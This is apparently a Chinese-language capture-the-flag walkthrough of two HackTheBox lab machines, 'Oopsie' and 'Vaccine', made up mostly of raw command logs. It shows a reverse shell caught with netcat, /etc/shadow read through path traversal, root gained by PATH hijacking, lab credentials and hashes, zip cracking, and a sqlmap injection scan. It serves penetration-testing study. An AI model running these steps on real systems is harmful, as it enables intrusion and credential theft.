Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.95.191
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/06/02 22:50:31 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 315] [--> http://10.129.95.191/images/]
/themes               (Status: 301) [Size: 315] [--> http://10.129.95.191/themes/]
/uploads              (Status: 301) [Size: 316] [--> http://10.129.95.191/uploads/]
/css                  (Status: 301) [Size: 312] [--> http://10.129.95.191/css/]
/js                   (Status: 301) [Size: 311] [--> http://10.129.95.191/js/]
/fonts                (Status: 301) [Size: 314] [--> http://10.129.95.191/fonts/]
/server-status        (Status: 403) [Size: 278]
Progress: 220289 / 220561 (99.88%)
===============================================================
2023/06/02 22:52:02 Finished
===============================================================

目录爆破直接就有 uploads，我们尝试访问 uploads，提示 Directory listing not allowed here. 虽然不能展示目录，但是我们上传的文件大概率传输到了这个目录下，尝试开启监听后，访问目标文件，反弹 shell 成功

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nc -lvnp 1234
listening on [any] 1234 ...

connect to [10.10.14.109] from (UNKNOWN) [10.129.95.191] 36364
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 02:57:08 up 44 min,  0 users,  load average: 0.00, 0.04, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ $ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 2: python: not found
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@oopsie:/$ whoami
whoami
www-data
www-data@oopsie:/$ uname -a
uname -a
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
www-data@oopsie:/$ sudo -l
sudo -l
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data:

sudo: 3 incorrect password attempts
www-data@oopsie:/$

提权

接下来考虑如何提权

robert@oopsie:/var/www/html/cdn-cgi/login$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
robert@oopsie:/var/www/html/cdn-cgi/login$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

passwd 文件和定时任务没有收获

www-data@oopsie:/$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
       66     40 -rwsr-xr-x   1 root     root        40152 Jan 27  2020 /snap/core/11420/bin/mount
       80     44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /snap/core/11420/bin/ping
       81     44 -rwsr-xr-x   1 root     root        44680 May  7  2014 /snap/core/11420/bin/ping6
       98     40 -rwsr-xr-x   1 root     root        40128 Mar 25  2019 /snap/core/11420/bin/su
      116     27 -rwsr-xr-x   1 root     root        27608 Jan 27  2020 /snap/core/11420/bin/umount
     2618     71 -rwsr-xr-x   1 root     root        71824 Mar 25  2019 /snap/core/11420/usr/bin/chfn
     2620     40 -rwsr-xr-x   1 root     root        40432 Mar 25  2019 /snap/core/11420/usr/bin/chsh
     2697     74 -rwsr-xr-x   1 root     root        75304 Mar 25  2019 /snap/core/11420/usr/bin/gpasswd
     2789     39 -rwsr-xr-x   1 root     root        39904 Mar 25  2019 /snap/core/11420/usr/bin/newgrp
     2802     53 -rwsr-xr-x   1 root     root        54256 Mar 25  2019 /snap/core/11420/usr/bin/passwd
     2912    134 -rwsr-xr-x   1 root     root       136808 Jan 20  2021 /snap/core/11420/usr/bin/sudo
     3011     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 11  2020 /snap/core/11420/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3383    419 -rwsr-xr-x   1 root     root              428240 Jun  7  2021 /snap/core/11420/usr/lib/openssh/ssh-keysign
     6457    109 -rwsr-xr-x   1 root     root              111080 Jul 14  2021 /snap/core/11420/usr/lib/snapd/snap-confine
     7638    386 -rwsr-xr--   1 root     dip               394984 Jul 23  2020 /snap/core/11420/usr/sbin/pppd
       66     40 -rwsr-xr-x   1 root     root               40152 Jan 27  2020 /snap/core/11743/bin/mount
       80     44 -rwsr-xr-x   1 root     root               44168 May  7  2014 /snap/core/11743/bin/ping
       81     44 -rwsr-xr-x   1 root     root               44680 May  7  2014 /snap/core/11743/bin/ping6
       98     40 -rwsr-xr-x   1 root     root               40128 Mar 25  2019 /snap/core/11743/bin/su
      116     27 -rwsr-xr-x   1 root     root               27608 Jan 27  2020 /snap/core/11743/bin/umount
     2618     71 -rwsr-xr-x   1 root     root               71824 Mar 25  2019 /snap/core/11743/usr/bin/chfn
     2620     40 -rwsr-xr-x   1 root     root               40432 Mar 25  2019 /snap/core/11743/usr/bin/chsh
     2697     74 -rwsr-xr-x   1 root     root               75304 Mar 25  2019 /snap/core/11743/usr/bin/gpasswd
     2789     39 -rwsr-xr-x   1 root     root               39904 Mar 25  2019 /snap/core/11743/usr/bin/newgrp
     2802     53 -rwsr-xr-x   1 root     root               54256 Mar 25  2019 /snap/core/11743/usr/bin/passwd
     2912    134 -rwsr-xr-x   1 root     root              136808 Jan 20  2021 /snap/core/11743/usr/bin/sudo
     3011     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 11  2020 /snap/core/11743/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3383    419 -rwsr-xr-x   1 root     root              428240 Jun  7  2021 /snap/core/11743/usr/lib/openssh/ssh-keysign
     6457    109 -rwsr-xr-x   1 root     root              111080 Aug 27  2021 /snap/core/11743/usr/lib/snapd/snap-confine
     7638    386 -rwsr-xr--   1 root     dip               394984 Jul 23  2020 /snap/core/11743/usr/sbin/pppd
    26836     32 -rwsr-xr-x   1 root     root               30800 Aug 11  2016 /bin/fusermount
    26889     28 -rwsr-xr-x   1 root     root               26696 Aug 22  2019 /bin/umount
    26845     44 -rwsr-xr-x   1 root     root               43088 Aug 22  2019 /bin/mount
    26887     64 -rwsr-xr-x   1 root     root               64424 Jun 28  2019 /bin/ping
    26903     44 -rwsr-xr-x   1 root     root               44664 Mar 22  2019 /bin/su
   264784     44 -rwsr-xr--   1 root     messagebus         42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   264653    108 -rwsr-sr-x   1 root     root              109432 Oct 30  2019 /usr/lib/snapd/snap-confine
   264974    428 -rwsr-xr-x   1 root     root              436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
   264791     12 -rwsr-xr-x   1 root     root               10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   264978     16 -rwsr-xr-x   1 root     root               14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
   396049    100 -rwsr-xr-x   1 root     root              100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
   264421     40 -rwsr-xr-x   1 root     root               37136 Mar 22  2019 /usr/bin/newuidmap
   264437     60 -rwsr-xr-x   1 root     root               59640 Mar 22  2019 /usr/bin/passwd
   264164     52 -rwsr-sr-x   1 daemon   daemon             51464 Feb 20  2018 /usr/bin/at
   264151     12 -rwsr-xr--   1 root     bugtracker          8792 Jan 25  2020 /usr/bin/bugtracker
   264420     40 -rwsr-xr-x   1 root     root               40344 Mar 22  2019 /usr/bin/newgrp
   264457     24 -rwsr-xr-x   1 root     root               22520 Mar 27  2019 /usr/bin/pkexec
   264215     76 -rwsr-xr-x   1 root     root               76496 Mar 22  2019 /usr/bin/chfn
   264217     44 -rwsr-xr-x   1 root     root               44528 Mar 22  2019 /usr/bin/chsh
   264598     20 -rwsr-xr-x   1 root     root               18448 Jun 28  2019 /usr/bin/traceroute6.iputils
   264419     40 -rwsr-xr-x   1 root     root               37136 Mar 22  2019 /usr/bin/newgidmap
   264310     76 -rwsr-xr-x   1 root     root               75824 Mar 22  2019 /usr/bin/gpasswd
   262535    148 -rwsr-xr-x   1 root     root              149080 Jan 19  2021 /usr/bin/sudo

s 权限的文件很多，但是真正有效的却几乎没有，不过有个特殊的文件 bugtracker，似乎不是系统文件，去看看吧

www-data@oopsie:/$ ls -liah /usr/bin/bugtracker
ls -liah /usr/bin/bugtracker
264151 -rwsr-xr-- 1 root bugtracker 8.6K Jan 25  2020 /usr/bin/bugtracker
www-data@oopsie:/$ file /usr/bin/bugtracker
file /usr/bin/bugtracker
/usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped

是个可执行文件，尝试运行一下

www-data@oopsie:/$ /usr/bin/bugtracker
/usr/bin/bugtracker
bash: /usr/bin/bugtracker: Permission denied
www-data@oopsie:/$ cd /tmp
cd /tmp
www-data@oopsie:/tmp$ /usr/bin/bugtracker
/usr/bin/bugtracker
bash: /usr/bin/bugtracker: Permission denied

没有权限执行……那就继续信息收集吧

www-data@oopsie:/var/www/html$ ls
ls
cdn-cgi  css  fonts  images  index.php  js  themes  uploads

有个 cdn-cgi 目录进去看看

www-data@oopsie:/var/www/html/cdn-cgi$ ls -liah
ls -liah
total 12K
58427 drwxr-xr-x 3 root root 4.0K Jul 28  2021 .
58146 drwxr-xr-x 9 root root 4.0K Jul 28  2021 ..
58428 drwxr-xr-x 2 root root 4.0K Jul 28  2021 login
www-data@oopsie:/var/www/html/cdn-cgi$ cd login
cd login
www-data@oopsie:/var/www/html/cdn-cgi/login$ ls -liah
ls -liah
total 28K
58428 drwxr-xr-x 2 root root 4.0K Jul 28  2021 .
58427 drwxr-xr-x 3 root root 4.0K Jul 28  2021 ..
58430 -rw-r--r-- 1 root root 6.3K Apr 15  2021 admin.php
58432 -rw-r--r-- 1 root root   80 Jan 24  2020 db.php
58429 -rw-r--r-- 1 root root 5.3K Apr 15  2021 index.php
58431 -rw-r--r-- 1 root root    0 Jan 24  2020 script.js
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>

横向移动切换用户

得到了数据库的用户名和密码，不过这个用户名似乎在 passwd 中也有，我们尝试使用 su 命令来切换用户

www-data@oopsie:/var/www/html/cdn-cgi/login$ su robert
su robert
Password: M3g4C0rpUs3r!

robert@oopsie:/var/www/html/cdn-cgi/login$ whoami
whoami
robert
robert@oopsie:/var/www/html/cdn-cgi/login$ sudo -l
sudo -l
[sudo] password for robert: M3g4C0rpUs3r!

Sorry, user robert may not run sudo on oopsie.

接下来我们就要回到之前那个没有权限运行文件中，看看这次是否能运行

robert@oopsie:/var/www/html/cdn-cgi/login$ cd /usr/bin
cd /usr/bin
robert@oopsie:/usr/bin$ bugtracker
bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 1
1
---------------

Binary package hint: ev-engine-lib

Version: 3.3.3-1

Reproduce:
When loading library in firmware it seems to be crashed

What you expected to happen:
Synchronized browsing to be enabled since it is enabled for that site.

What happened instead:
Synchronized browsing is disabled. Even choosing VIEW > SYNCHRONIZED BROWSING from menu does not stay enabled between connects.

感觉像是输入一个漏洞的 id，就会获得对应的描述

robert@oopsie:/usr/bin$ ^[[A
bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 11
11
---------------

cat: /root/reports/11: No such file or directory

这次尝试输入一个较大的数字，发现提示 cat 没有读取到对应的文件，这里可以尝试一下存不存在本地任意文件读取

robert@oopsie:/usr/bin$ ^[[A
./bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: ../../../etc/shadow
../../../etc/shadow
---------------

root:$6$eD0n5saZ$orykpdd7mVL/lF57rIGwUzeSROPC1KRITJ45Nqn6P2BLaZ.tcSOy5fNFcOw9uBRkClgu5R9WlyxpEId5qOOVY.:18285:0:99999:7:::
daemon:*:18113:0:99999:7:::
bin:*:18113:0:99999:7:::
sys:*:18113:0:99999:7:::
sync:*:18113:0:99999:7:::
games:*:18113:0:99999:7:::
man:*:18113:0:99999:7:::
lp:*:18113:0:99999:7:::
mail:*:18113:0:99999:7:::
news:*:18113:0:99999:7:::
uucp:*:18113:0:99999:7:::
proxy:*:18113:0:99999:7:::
www-data:*:18113:0:99999:7:::
backup:*:18113:0:99999:7:::
list:*:18113:0:99999:7:::
irc:*:18113:0:99999:7:::
gnats:*:18113:0:99999:7:::
nobody:*:18113:0:99999:7:::
systemd-network:*:18113:0:99999:7:::
systemd-resolve:*:18113:0:99999:7:::
syslog:*:18113:0:99999:7:::
messagebus:*:18113:0:99999:7:::
_apt:*:18113:0:99999:7:::
lxd:*:18113:0:99999:7:::
uuidd:*:18113:0:99999:7:::
dnsmasq:*:18113:0:99999:7:::
landscape:*:18113:0:99999:7:::
pollinate:*:18113:0:99999:7:::
sshd:*:18284:0:99999:7:::
robert:$6$kriHoPwv$iBt45Fu0g4R0uNWSubfjDRvtUSwxVu.U1JhYKmT4voMWlVc3/u2nu0j0JZL0YWmm62vRgAs4acBl8Ge.S393H/:18285:0:99999:7:::
mysql:!:18284:0:99999:7:::

确实存在本地任意文件读取，不过这个密码爆破不出结果(，只能再考虑别的方法，借助于搜索引擎发现可以利用环境变量搞事情，思维局限了没考虑到这方面。

robert@oopsie:/usr/bin$ cd /tmp
cd /tmp
robert@oopsie:/tmp$ echo "/bin/bash" > cat
echo "/bin/bash" > cat
robert@oopsie:/tmp$ chmod +x cat
chmod +x cat
robert@oopsie:/tmp$ ls -liah
ls -liah
total 12K
131145 drwxrwxrwt  2 root   root   4.0K Jun  3 03:25 .
     2 drwxr-xr-x 24 root   root   4.0K Oct 11  2021 ..
131132 -rwxrwxr-x  1 robert robert   10 Jun  3 03:25 cat

环境变量提权

• Navigate to the /tmp folder.
• Write the /bin/bash command to a new file named cat.
• Give this newly created cat file executable permission with the chmod +x command.
• To check the newly created cat file permissions, type ls -l and ensure the “x” flag.
• To check the newly created cat file content, type cat ./cat and ensure the content.

robert@oopsie:/tmp$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
robert@oopsie:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
robert@oopsie:/tmp$ echo $PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
robert@oopsie:/tmp$ which cat
which cat
/tmp/cat
robert@oopsie:/tmp$ /usr/bin/bugtracker
/usr/bin/bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 1
1
---------------

root@oopsie:/tmp# whoami
whoami
root
root@oopsie:/tmp# id
id
uid=0(root) gid=1000(robert) groups=1000(robert),1001(bugtracker)
root@oopsie:/tmp# uname -a
uname -a
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
root@oopsie:/tmp# sudo -l
sudo -l
Matching Defaults entries for root on oopsie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User root may run the following commands on oopsie:
    (ALL : ALL) ALL
root@oopsie:/tmp# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:71:b9 brd ff:ff:ff:ff:ff:ff
    inet 10.129.95.191/16 brd 10.129.255.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:71b9/64 scope global dynamic mngtmpaddr
       valid_lft 86398sec preferred_lft 14398sec
    inet6 fe80::250:56ff:feb9:71b9/64 scope link
       valid_lft forever preferred_lft forever
root@oopsie:/tmp#

Vaccine

信息收集

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.129.5.22
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 04:28 EDT
Warning: 10.129.5.22 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.5.22
Host is up (0.031s latency).
Not shown: 64771 closed tcp ports (reset), 761 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 28.68 seconds

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap -sT -sV -sC -p21,22,80 10.129.5.22
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 04:29 EDT
Nmap scan report for 10.129.5.22
Host is up (0.0045s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.109
|      Logged in as ftpuser
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c0ee58077534b00b9165b259569527a4 (RSA)
|   256 ac6e81188922d7a7417d814f1bb8b251 (ECDSA)
|_  256 425bc321dfefa20bc95e03421d69d028 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: MegaCorp Login
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.40 seconds

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --script=vuln -p21,22,80 10.129.5.22
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 04:37 EDT
Nmap scan report for 10.129.5.22
Host is up (0.0035s latency).

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.5.22
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://10.129.5.22:80/
|     Form id: login__username
|_    Form action:
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set

Nmap done: 1 IP address (1 host up) scanned in 32.32 seconds

ftp 匿名登录

试一试匿名登录 ftp

┌──(i3eg1nner㉿minilite)-[~]
└─$ ftp 10.129.5.22
Connected to 10.129.5.22.
220 (vsFTPd 3.0.3)
Name (10.129.5.22:i3eg1nner): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||10107|)
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
226 Directory send OK.
ftp> get backup.zip
local: backup.zip remote: backup.zip
229 Entering Extended Passive Mode (|||10016|)
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
100% |*****************************************************************************************************************************************************************|  2533        1.58 MiB/s    00:00 ETA
226 Transfer complete.
2533 bytes received in 00:00 (429.74 KiB/s)

登录成功，下载了一个文件 backup.zip，一般不建议直接解压文件，这里我们先使用 zip -l 来看看压缩包里是什么文件

┌──(i3eg1nner㉿minilite)-[~]
└─$ unzip -l backup.zip
Archive:  backup.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
     2594  2020-02-03 05:57   index.php
     3274  2020-02-03 14:04   style.css
---------                     -------
     5868                     2 files

应该没风险，解压试试

┌──(i3eg1nner㉿minilite)-[~]
└─$ unzip backup.zip
Archive:  backup.zip
[backup.zip] index.php password:
   skipping: index.php               incorrect password
   skipping: style.css               incorrect password

John 爆破 zip 密码

需要密码（接下来考虑破解 zip 密码试试。首先我们要使用 zip2john 工具来将其进行转化，如何借助于 john 来爆破密码。

┌──(i3eg1nner㉿minilite)-[~]
└─$ zip2john backup.zip > hashes.txt
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

┌──(i3eg1nner㉿minilite)-[~]
└─$ cat hashes.txt
backup.zip:$pkzip$2*1*1*0*8*24*5722*543fb39ed1a919ce7b58641a238e00f4cb3a826cfb1b8f4b225aa15c4ffda8fe72f60a82*2*0*3da*cca*1b1ccd6a*504*43*8*3da*989a*22290dc3505e51d341f31925a7ffefc181ef9f66d8d25e53c82afc7c1598fbc3fff28a17ba9d8cec9a52d66a11ac103f257e14885793fe01e26238915796640e8936073177d3e6e28915f5abf20fb2fb2354cf3b7744be3e7a0a9a798bd40b63dc00c2ceaef81beb5d3c2b94e588c58725a07fe4ef86c990872b652b3dae89b2fff1f127142c95a5c3452b997e3312db40aee19b120b85b90f8a8828a13dd114f3401142d4bb6b4e369e308cc81c26912c3d673dc23a15920764f108ed151ebc3648932f1e8befd9554b9c904f6e6f19cbded8e1cac4e48a5be2b250ddfe42f7261444fbed8f86d207578c61c45fb2f48d7984ef7dcf88ed3885aaa12b943be3682b7df461842e3566700298efad66607052bd59c0e861a7672356729e81dc326ef431c4f3a3cdaf784c15fa7eea73adf02d9272e5c35a5d934b859133082a9f0e74d31243e81b72b45ef3074c0b2a676f409ad5aad7efb32971e68adbbb4d34ed681ad638947f35f43bb33217f71cbb0ec9f876ea75c299800bd36ec81017a4938c86fc7dbe2d412ccf032a3dc98f53e22e066defeb32f00a6f91ce9119da438a327d0e6b990eec23ea820fa24d3ed2dc2a7a56e4b21f8599cc75d00a42f02c653f9168249747832500bfd5828eae19a68b84da170d2a55abeb8430d0d77e6469b89da8e0d49bb24dbfc88f27258be9cf0f7fd531a0e980b6defe1f725e55538128fe52d296b3119b7e4149da3716abac1acd841afcbf79474911196d8596f79862dea26f555c772bbd1d0601814cb0e5939ce6e4452182d23167a287c5a18464581baab1d5f7d5d58d8087b7d0ca8647481e2d4cb6bc2e63aa9bc8c5d4dfc51f9cd2a1ee12a6a44a6e64ac208365180c1fa02bf4f627d5ca5c817cc101ce689afe130e1e6682123635a6e524e2833335f3a44704de5300b8d196df50660bb4dbb7b5cb082ce78d79b4b38e8e738e26798d10502281bfed1a9bb6426bfc47ef62841079d41dbe4fd356f53afc211b04af58fe3978f0cf4b96a7a6fc7ded6e2fba800227b186ee598dbf0c14cbfa557056ca836d69e28262a060a201d005b3f2ce736caed814591e4ccde4e2ab6bdbd647b08e543b4b2a5b23bc17488464b2d0359602a45cc26e30cf166720c43d6b5a1fddcfd380a9c7240ea888638e12a4533cfee2c7040a2f293a888d6dcc0d77bf0a2270f765e5ad8bfcbb7e68762359e335dfd2a9563f1d1d9327eb39e68690a8740fc9748483ba64f1d923edfc2754fc020bbfae77d06e8c94fba2a02612c0787b60f0ee78d21a6305fb97ad04bb562db282c223667af8ad907466b88e7052072d6968acb7258fb8846da057b1448a2a9699ac0e5592e369fd6e87d677a1fe91c0d0155fd237bfd2dc49*$/pkzip$::backup.zip:style.css, index.php:backup.zip

注意 john 对于已经爆破的密码，需要使用–show 命令才能展示出爆破的结果

┌──(i3eg1nner㉿minilite)-[~]
└─$ john --show hash.txt
backup.zip:741852963::backup.zip:style.css, index.php:backup.zip

1 password hash cracked, 0 left

使用密码进行解压，然后查看文件内容，我们更关注 php 文件

┌──(i3eg1nner㉿minilite)-[~]
└─$ cat index.php
<!DOCTYPE html>
<?php
session_start();
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");
    }
  }
?>

关键代码中有登录用户名和密码的哈希值，我们借助于在线工具来获得密码

接下来查看 web 界面，打开网页发现是个登录界面，使用用户名和密码直接登录成功，我们看到有个搜索框，这也是常见的 sql 漏洞存在的地方，因此我们尝试使用 sqlmap 跑一下

┌──(i3eg1nner㉿minilite)-[~]
└─$ sqlmap -u 'http://10.129.112.231/dashboard.php?search=any+query' --cookie="PHPSESSID=sg30eek98th94d529cq6u1e1jk"
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.7.2#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:00:33 /2023-06-05/

[04:00:33] [INFO] testing connection to the target URL
[04:00:33] [INFO] testing if the target URL content is stable
[04:00:33] [INFO] target URL content is stable
[04:00:33] [INFO] testing if GET parameter 'search' is dynamic
[04:00:33] [WARNING] GET parameter 'search' does not appear to be dynamic
[04:00:33] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[04:00:34] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] y
[04:00:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:00:41] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[04:00:41] [INFO] testing 'Generic inline queries'
[04:00:41] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[04:00:41] [INFO] GET parameter 'search' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable
[04:00:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
